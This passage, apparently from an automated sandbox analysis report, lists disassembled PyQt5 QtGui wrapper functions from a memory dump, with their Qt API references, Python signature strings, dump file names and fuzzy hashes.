Instruction Fuzzy Hash: C80180B6B09F4A81DB009F64E8986AD33A4FF44BA1F554436CA5D03324EF78D998C340

Function 00007FFD8624AFC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

?mightBeRichText@Qt@@YA_NAEBVQString@@@Z.QT5GUI ref: 00007FFD8624B011
PyBool_FromLong.PYTHON3 ref: 00007FFD8624B03B

Strings

mightBeRichText, xrefs: 00007FFD8624B05E
mightBeRichText(a0: Optional[str]) -> bool, xrefs: 00007FFD8624B052

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?mightBool_FromLongQt@@RichString@@@Text@
String ID: mightBeRichText$mightBeRichText(a0: Optional[str]) -> bool
API String ID: 2885262247-3975725669
Opcode ID: fefc2b42069bb198425a64e85334775fc59ec77ff6282e6374287f509b850d0c
Instruction ID: 8c9cc5d25c0120984da32925e4e3c3f78438f18d27d3c9b04059b8cfed2bda68
Opcode Fuzzy Hash: fefc2b42069bb198425a64e85334775fc59ec77ff6282e6374287f509b850d0c
Instruction Fuzzy Hash: F7110A76B1CB4682DB409F15F8545AE77A0FB89BA4F441132EA8E43724DF3CE848CB00

Function 00007FFD86258E90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?filePath@QWindow@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD86258EE8

Strings

filePath, xrefs: 00007FFD86258F20
QWindow, xrefs: 00007FFD86258F27
filePath(self) -> str, xrefs: 00007FFD86258F14

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?filePath@String@@Window@@malloc
String ID: QWindow$filePath$filePath(self) -> str
API String ID: 4173617996-890896491
Opcode ID: 763b6a8daba5b3a7682b389300e5caf37f1a6686a338b4d34536d10f9aa9f953
Instruction ID: 5fc4c7a95dd3338e2fd7d87f620bf4c7a091c5b9b50d558f1f8a5a2ffe4db7d3
Opcode Fuzzy Hash: 763b6a8daba5b3a7682b389300e5caf37f1a6686a338b4d34536d10f9aa9f953
Instruction Fuzzy Hash: BD111B75B08A46C1EB00EF65E8A97AD33A4FB54BA4F954072CA5D07320DF7DD989C740

Function 00007FFD86284E80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?fragment@iterator@QTextBlock@@QEBA?AVQTextFragment@@XZ.QT5GUI ref: 00007FFD86284ED8

Strings

iterator, xrefs: 00007FFD86284F17
fragment, xrefs: 00007FFD86284F10
fragment(self) -> QTextFragment, xrefs: 00007FFD86284F04

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?fragment@iterator@Block@@Fragment@@malloc
String ID: fragment$fragment(self) -> QTextFragment$iterator
API String ID: 3723782697-916351825
Opcode ID: ad5adeeca84231e816bfffc74b22618bf0c48bea45b3e2df687069e32815d998
Instruction ID: 277c660f396951113df583d916cf9b3f55948319a8448abbf6d25fad5567beef
Opcode Fuzzy Hash: ad5adeeca84231e816bfffc74b22618bf0c48bea45b3e2df687069e32815d998
Instruction Fuzzy Hash: 6A111775B08A8681EB00EF69E8A97AD37A4FB58BA4F954072CA4D03720DF7DD949C740

Function 00007FFD8628CA60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?setTextFormat@QStaticText@@QEAAXW4TextFormat@Qt@@@Z.QT5GUI ref: 00007FFD8628CAC2

Strings

setTextFormat, xrefs: 00007FFD8628CAF1
QStaticText, xrefs: 00007FFD8628CAF8
setTextFormat(self, textFormat: Qt.TextFormat), xrefs: 00007FFD8628CAE5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Format@Text$?setQt@@@StaticText@@
String ID: QStaticText$setTextFormat$setTextFormat(self, textFormat: Qt.TextFormat)
API String ID: 2794307452-935631387
Opcode ID: 86067a1dfb38150c5616ab4375c1fe2abc0b1a533eceaebe018a86e90602bb3d
Instruction ID: 03b55a41dfdb9c5a1dbd48985866fb518604126ca04921f9643ba9dd78256d3d
Opcode Fuzzy Hash: 86067a1dfb38150c5616ab4375c1fe2abc0b1a533eceaebe018a86e90602bb3d
Instruction Fuzzy Hash: 3A11B675B18F4681EB00DF15E8996AD33B5FB48BA4F954132CA5D03320DF39D95AC740

Function 00007FFD86294A60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?currentBlock@iterator@QTextFrame@@QEBA?AVQTextBlock@@XZ.QT5GUI ref: 00007FFD86294AB8

Strings

iterator, xrefs: 00007FFD86294AF7
currentBlock, xrefs: 00007FFD86294AF0
currentBlock(self) -> QTextBlock, xrefs: 00007FFD86294AE4

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?currentBlock@@Block@iterator@Frame@@malloc
String ID: currentBlock$currentBlock(self) -> QTextBlock$iterator
API String ID: 728702334-1199497761
Opcode ID: 5840ece69283942caa99c85722f6a3ec7bcde2d1acacf4fec9f4b5c0d2af038d
Instruction ID: 8912ebe3e1f3170d44c2bfff45d49058970350b251188885a31ea82a4d1b984c
Opcode Fuzzy Hash: 5840ece69283942caa99c85722f6a3ec7bcde2d1acacf4fec9f4b5c0d2af038d
Instruction Fuzzy Hash: FA110575B08A4A81EB00AF69E8A9BAD37A4FB54BA1F954072CA5D03320DF7DD949C340

Function 00007FFD86280ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?setUnderlineStyle@QTextCharFormat@@QEAAXW4UnderlineStyle@1@@Z.QT5GUI ref: 00007FFD86280F32

Strings

setUnderlineStyle, xrefs: 00007FFD86280F61
setUnderlineStyle(self, style: QTextCharFormat.UnderlineStyle), xrefs: 00007FFD86280F55
QTextCharFormat, xrefs: 00007FFD86280F68

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Underline$?setCharFormat@@Style@Style@1@@Text
String ID: QTextCharFormat$setUnderlineStyle$setUnderlineStyle(self, style: QTextCharFormat.UnderlineStyle)
API String ID: 1182914909-3441956564
Opcode ID: 25e0429b32fdc38097c65838aec217a308f9938f85d4652b06500fdd22020a47
Instruction ID: 4ed6242b6c6b7f235009a30ae5afaa905ffbea4e198850d7e997b8d30fa34999
Opcode Fuzzy Hash: 25e0429b32fdc38097c65838aec217a308f9938f85d4652b06500fdd22020a47
Instruction Fuzzy Hash: A911E336B18F4681EB009F55E8996AD33B5FB58BA4F954132CA5D03320DF39D94AC740

Function 00007FFD86282F10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?anchorNames@QTextCharFormat@@QEBA?AVQStringList@@XZ.QT5GUI ref: 00007FFD86282F68

Strings

anchorNames, xrefs: 00007FFD86282FA0
QTextCharFormat, xrefs: 00007FFD86282FA7
anchorNames(self) -> List[str], xrefs: 00007FFD86282F94

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?anchorCharFormat@@List@@Names@StringTextmalloc
String ID: QTextCharFormat$anchorNames$anchorNames(self) -> List[str]
API String ID: 3062846784-1478750451
Opcode ID: 0abde7554c518996227d210a24af5acc1cf2585c2bb1b9d608e534a604a1fdea
Instruction ID: ae6055282e5c12d522c8eee756cd7aa5a2cb77ab0febfee9f17c69195d0f1fa9
Opcode Fuzzy Hash: 0abde7554c518996227d210a24af5acc1cf2585c2bb1b9d608e534a604a1fdea
Instruction Fuzzy Hash: 82111B75B08A4681EB00EF69E8A97AD37A4FF58BA0F954072CA4D03320DF7DD949C740

Function 00007FFD86250F00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?sessionKey@QSessionManager@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD86250F58

Strings

sessionKey(self) -> str, xrefs: 00007FFD86250F84
QSessionManager, xrefs: 00007FFD86250F97
sessionKey, xrefs: 00007FFD86250F90

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?sessionKey@Manager@@SessionString@@malloc
String ID: QSessionManager$sessionKey$sessionKey(self) -> str
API String ID: 2389658061-1622898092
Opcode ID: 51098b0a7f4c7443c9b103cdae9b0ff4c27d9b57e13cb4491996f211016dc0dd
Instruction ID: a0abc3ea4245383186ab3535a6d8b196b427e1d82eec24699f30b28ca0f8b8ce
Opcode Fuzzy Hash: 51098b0a7f4c7443c9b103cdae9b0ff4c27d9b57e13cb4491996f211016dc0dd
Instruction Fuzzy Hash: 8F110975B08A46C1EB00DF55E8696AD37A4FF54BA0F954072CA5D43360DF7DD989C340

Function 00007FFD8623EEF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?font@QTextLayout@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FFD8623EF48

Strings

font(self) -> QFont, xrefs: 00007FFD8623EF74
QTextLayout, xrefs: 00007FFD8623EF87
font, xrefs: 00007FFD8623EF80

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?font@Font@@Layout@@Textmalloc
String ID: QTextLayout$font$font(self) -> QFont
API String ID: 542803609-902316991
Opcode ID: f903734466d4f0c54454adb5e49ce5912a914c6eec9aefe9524bff118a92f6af
Instruction ID: 25174abab7392121a248f3ef39051ad433dcf4cc8e3bc7a05d9ad04ed55706e0
Opcode Fuzzy Hash: f903734466d4f0c54454adb5e49ce5912a914c6eec9aefe9524bff118a92f6af
Instruction Fuzzy Hash: 5F110575B08A4681EB00EF65E8A96AD33A4FF84BA0F954072CA5D07320DFBDD949C340

Function 00007FFD86238EE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?locale@QValidator@@QEBA?AVQLocale@@XZ.QT5GUI ref: 00007FFD86238F38

Strings

locale(self) -> QLocale, xrefs: 00007FFD86238F64
QValidator, xrefs: 00007FFD86238F77
locale, xrefs: 00007FFD86238F70

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
